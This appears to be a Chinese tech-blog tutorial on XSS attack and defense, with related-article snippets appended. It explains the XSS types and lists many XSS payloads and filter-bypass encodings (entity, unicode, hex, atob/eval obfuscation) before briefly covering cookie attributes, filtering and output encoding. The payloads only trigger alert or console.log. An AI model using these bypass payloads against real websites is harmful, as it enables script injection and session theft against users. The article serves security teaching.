XSS漏洞攻击与防御

最新推荐文章于 2024-09-05 17:49:01 发布
最新推荐文章于 2024-09-05 17:49:01 发布
阅读量568 收藏 1
点赞数 1
文章标签: xss 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46001025/article/details/132693555
版权

简述

跨站脚本攻击(Cross Site Scripting)为了避免和层叠样式表(Cascading Style Sheets)缩写混淆,缩写为XSS。XSS是一种将任意JavaScript代码插入到Web用户页面里去执行以达到攻击目的漏洞。

XSS原理

主要原因是程序对用户的输入和输出没有进行严格的控制,当用户进行浏览页面时,浏览器会解析恶意的JavaScript代码,从而使用户被攻击。常见的攻击方式有窃取用户Cookie、模拟用户操作。

XSS分类

反射型XSS

反射型XSS(Reflected XSS Attacks)是一种非持久型的攻击,注入payload到漏洞点,浏览器立即解析并将结果反馈给攻击者。
常见的注入点:网站的搜索框、用户登录口、表单等地方。

存储型XSS

存储型XSS(Stored XSS Attacks)是一种持久型的攻击,漏洞产生原因一般是服务器未对用户输入的数据进行安全过滤保存到了服务器,每当有用户访问时就会触发其中恶意的代码。
常见的注入点:留言板、评论、日志等地方。

DOM型XSS

一种特殊的反射型XSS,基于DOM树修改浏览器的页面。下图中若输入框的内容为' onclick="alert('xss')" ,再点击a标签即可弹窗。(Pikachu靶场)

XSS利用

常见XSS payload

三种弹窗方式
alert('警告框')、prompt('提示框')、confirm('确认框')

<script>console.log(/xss/)</script>
# console.log()向控制台输出

<svg οnlοad=console.log(1)>
<img src=document.domain οnerrοr=console.log(2)>
<M οnmοuseοver=console.log(3)>M
<a href=javascript:console.log(4)>M</a>
<body οnlοad=console.log(5)>
<details open οntοggle=console.log(6)>
<embed src=javascript:console.log(7)>

拓展

浏览器在解析html文档时一般都会有三个过程:HTML解析、Javascript解析、URL解析
JavaScript解析

script块有个特性:在块中的字符实体引用不会被解析和解码。而对于Unicode转义字符,JavaScript会视三种情况而定:

  • 字符串中:<srcipt>var a=‘hi\u0027;alert(xss);//’</script>
    27为单引号,但转义字符出现在字符串中,解析后不会产生实际效果,不能闭合前面的单引号,报错

  • 控制字符中:<srcipt>console.log\u00281)</script>
    控制字符常见有单引号、双引号、圆括号等,在控制字符中不会产生实际效果,报错

  • 标识符名称中:<srcipt>console.\u006cog(1)</script>
    6c为字符l,它会被JavaScript解析,产生实际效果,最终会向控制台输出1

因此,我们可以通过对XSS代码的编码绕过一些防护

<a href="javascript:alert('test')">link</a>
<a href="javascript&colon;alert(1)">link</a>
<a href="javas&Tab;cript:\u0061lert(1);">link</a>
<a href="javascript:\u0061lert&#x28;1&#x29">Hello</a>
<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a>
<a href=javascript:eval("&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;")>link</a>
<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>link</a>

<BODY ONLOAD=alert('XSS')>
<img src=1 οnerrοr=alert('xss')>
<img/src='1'/οnerrοr=alert('xss')>
<img src=1 οnmοuseοver=alert('xss')> 

<div οnclick="alert('xss')">111</div>
<div οnmοuseenter="alert('xss')">222</div>
<div style="width:100px;height:100px;overflow:scroll" οnscrοll="alert('a')">123456<br/><br/><br/><br/><br/>

<script>alert(0)</script>
<script>top['alert'](1)</script>
<script>self['alert'](2)</script>
<script>parent['alert'](3)</script>
<script>window['alert'](4)</script>
<script>Function(atob('YWxlcnQoInhzcyIp'))()</script>
<script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>

XSS防御

Session和Cookie

HTTP协议是无状态的,当服务端需要记录用户状态时,这时Session就诞生了。
Session的作用就是标识是哪个用户,当用户第一次访问服务器后,服务器会生成一个唯一ID,并以Cookie的方式发送到浏览器,只要用户进行操作时带上有Session ID的Cookie,那么服务器就知道是谁。这种基于唯一ID识别用户身份的机制称为Session。Session保存在服务端。
Cookie是指网站为了辨别用户身份而储存在客户端上的数据。Cookie保存在客户端。Cookie可以由服务器设置也可以客户端设置
服务端通过Set-Cookie设置Cookie值,若有多项则多个Set-Cookie字段。
我们可以通过设置Cookie属性防止攻击者通过XSS漏洞窃取Cookie和跨域访问。
Cookie常见参数

输入过滤

当需接收用户输入的数据时,对常见的一些XSS利用关键字符进行过滤,比如说javascript alert document等字符串。

输出编码与转义

当将数据输出到页面时进行编码和转义处理

  • htmlspecialchars():把预定义的字符转换为HTML实体
  • htmlentities():把特殊字符转换为HTML实体

欢迎关注公众号,目前会发布一些漏洞POC,感谢支持
在这里插入图片描述

id无
关注
JAVA WEB之XSS漏洞详解及防御措施
洛阳泰山的博客
09-06 2155
pom文件依赖 <!--jsoup--> <dependency> <groupId>org.jsoup</groupId> <artifactId>jsoup</artifactId> <version>1.13.1</version> </dependency> 工具类代码
XSS攻击防御
dzqxwzoe的博客
01-14 221
Cross Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击攻击者通过在目标网站上注入恶意脚本,使其在用户的浏览器上运行。通过这些恶意的脚本,攻击者可获取用户的敏感信息如:Cookie、Session等。Cross Site Scripting 的英文首字母缩写应为 CSS,但是因为其和我们的样式语法 CSS(Cascading Style Sheets)一样,所以将 CSS 改成 XSS
XSS漏洞攻击与防护
m0_62425768的博客
10-27 137
(1) 熟悉 XSS漏洞攻击的流程;(2) 了解XSS漏洞攻击的危害;(3) 复现XSS漏洞攻击,并掌握一定的防护手段。
五分钟带你了解XSS攻击
ORANGE_3iING的博客
07-31 885
跨站脚本攻击XSS) 是一种,它允许攻击者。此代码由用户执行,让攻击者并冒充用户。如果 Web 应用程序没有采用足够的,则这些攻击会成功。用户的浏览器无法检测到恶意脚本是不可信的,因此允许其访问任何 Cookie、会话令牌或其他特定于站点的敏感信息,或者让恶意脚本重写 HTML 内容。
手摸手带你进行XSS攻击防御
公众号:该用户快成仙了
07-31 1001
简单来说,通过设置CSP来控制浏览器加载页面时允许执行的资源来源,这样来减少XSS攻击
web安全XSS攻击原理及防范
潘晓宇(panxiaoyu)的专栏
08-02 367
//https://blog.csdn.net/xueqh/article/details/78366320 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Data.OleDb; using System.Drawing; u...
网络安全-跨站脚本攻击(XSS)的原理、攻击防御
热门推荐
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
XSS漏洞攻击与防护源代码
10-31
XSS(Cross-site scripting)是一..."shiyaner"这个文件可能是包含了一些实验或示例代码,用于演示XSS漏洞攻击方式以及如何防护。通过学习这些源代码,开发者可以更好地理解和实践XSS防护策略,提高Web应用的安全性。
Web安全XSS攻击防御小结
02-23
攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击的服务器URL。受害者在Web浏览器中打开URL,恶意脚本执行。(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,...
.net core xss攻击防御的方法
10-18
.NET Core XSS攻击防御方法的知识点可以详细阐述如下: 首先,XSS攻击全称跨站脚本攻击,它是一种常见的网络安全漏洞攻击者利用这一漏洞,在Web页面中植入恶意脚本代码,当其他用户浏览这些页面时,嵌入的恶意...
XSS漏洞原理及防御方式
GL的博客
03-07 4243
XSS漏洞 Cross Sitescript跨站脚本攻击,客户端脚本安全中的头号大敌 XSS攻击:(需要具备两个条件) 1、需要向WEB页面注入恶意代码 2、这些恶意代码能够被浏览器成功执行 XSS攻击类型: 1、反射攻击 用户输入的数据反射给浏览器,这个数据可能是Html代码或者Js代码,反射给浏览器去执行 2、存储型攻击 用户把输入的数据(比较恶意的JS代码)储存在服务器端,具有很强的稳定性,危害时间长 XSS危害: 1、 劫持Cookie,cookie一般保存了用户
xss攻击详解
剁椒鱼头没剁椒的博客
11-15 8784
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
XSS攻击详解
xllllll___的博客
02-17 1716
1.盗用cookie,获取用户的敏感信息;2.利用iframe,frame等方式,以用户的身份执行一些管理动作,或者执行一些一般的行为比如说发私信,加好友等;3.在一些访问量极大的页面上进行XSS攻击可以攻击一些小型网站;4.利用一些可被攻击的域或者其它的域信任的特点,以受信任来源的身份请求一些平时不被允许的操作。
XSS攻击介绍(一)】
qq_55213436的博客
04-12 2万+
一、前言 XSS:跨站脚本攻击,即CSS。利用网页开发时留下的漏洞(web应用程序对用户的输入过滤不足),巧妙的将恶意的代码注入到网页中,使用户浏览器加载并执行恶意制造的代码,以达到攻击的效果。这恶意的代码通常是JS代码,但实际上也可以是JAVA、VBS、ActiveX、Flash或者是普通的HTML。(浏览器不会判断,只要是符合解析,那么就会执行恶意的代码)。可能存在XSS的地方:微博、留言板、聊天室等收集用户输入的地方都可能遭受XSS攻击的风险。只要你对用户的输入没有严格过滤。 ...
实战 | 记某个有趣的xss挖掘之旅
Sp4rkW的博客
03-23 1423
最近某次挖洞的过程中遇到一个非常有意思的xss,记录一下与大家分享,全文已脱敏 目录速览存在xss的可疑点走出去走回来 存在xss的可疑点 测试时某被动扫描器打到了一个疑似xss的点 随手掏万能验证payloadconsole.log(111),但是.被转换成了_,空格也被转换成了_ 空格通过注释/**/解决问题,但最大的问题还是在于.被拦截了 各种编码尝试一波,无果,开始尝试诸如alert,...
XSS(跨站脚本攻击)详解
hello
07-02 4000
XSS简述-XSS类型-XSS常用标签
xss注入小例子
Sakura__Lu的博客
03-23 1228
const httpManager = require('http'); const mysql = require('mysql'); // const urlManager = require('url'); var express = require('express'); var app = express(); // 解析参数 const bodyParser = require...
测试xss攻击
qq_37338658的博客
12-13 194
var a = 0 console.log(a)
console.log(‘各种打印输出‘)
最新发布
我们好像在哪见过~
09-05 573
佛祖镇楼,点赞过千!!!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值